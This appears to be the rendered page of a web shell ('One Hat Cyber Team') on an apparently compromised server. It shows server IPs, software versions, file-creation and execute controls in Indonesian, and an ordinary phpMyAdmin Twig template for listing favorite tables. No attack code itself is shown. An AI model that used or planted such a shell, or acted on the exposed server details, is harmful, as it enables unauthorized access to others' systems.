⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.231
Server IP:
104.21.80.1
Server:
Linux vmi2315822.contaboserver.net 5.15.0-134-generic #145-Ubuntu SMP Wed Feb 12 20:08:39 UTC 2025 x86_64
Server Software:
LiteSpeed
PHP Version:
8.3.21
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
local
/
CyberCP
/
public
/
phpmyadmin
/
templates
/
View File Name :
recent_favorite_table_favorite.twig
{% for table in tables %} <li class="warp_link"> <a class="ajax favorite_table_anchor" href="{{ url('/database/structure/favorite-table', table.remove_parameters) }}" title="{% trans 'Remove from Favorites' %}" data-favtargetn="{{ table.table_parameters.md5 }}" > {{ get_icon('b_favorite') }} </a> <a href="{{ url('/table/recent-favorite', table.table_parameters) }}"> `{{ table.table_parameters.db }}`.`{{ table.table_parameters.table }}` </a> </li> {% endfor %}